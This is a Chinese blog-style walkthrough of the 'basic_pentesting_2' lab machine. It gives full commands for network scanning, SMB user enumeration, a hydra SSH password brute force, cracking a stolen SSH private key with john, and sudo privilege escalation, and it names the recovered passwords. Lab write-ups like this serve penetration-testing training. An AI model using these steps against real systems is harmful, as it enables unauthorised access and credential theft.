basic_pentesting_2

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

使用nmap端口扫描发现靶机开放端口:22、80、139、445、8009、8080

nmap 192.168.236.162 -p- -A

3、目录扫描

发现 /development 目录

dirsearch -u http://192.168.236.162

二、漏洞探测

步骤一:访问 80 端口,拼接访问 /development

步骤二:访问发现提示信息

J用户一直在审核 /etc/shadow 的内容
K用户的密码是弱口令

步骤三:靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,发现两个用户 kay,jan

enum4linux -a -o 192.168.236.162

三、GetShell

步骤一:使用hydra爆破jan用户的密码

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.236.162:22 -t 64

jan:armando

步骤二:ssh 登录

四、提权

步骤一:没有发现存在特权的命令,翻看文件,发现 /home/kay 目录存在 pass.bak 文件,但是没有访问权限

步骤二:我们可以访问 kay 用户的ssh私钥文件,将私钥文件复制到本地,设置权限并尝试登录,需要密码

chmod 600 id_rsa
ssh -i id_rsa kay@192.168.236.162

步骤三:通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码 beeswax

ssh2john id_rsa > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

步骤四:登录ssh,查看pass.bak文件,可能是kay用户的密码

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

步骤五:sudo -l 查看命令,sudo su 成功提权

步骤六:查看 flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值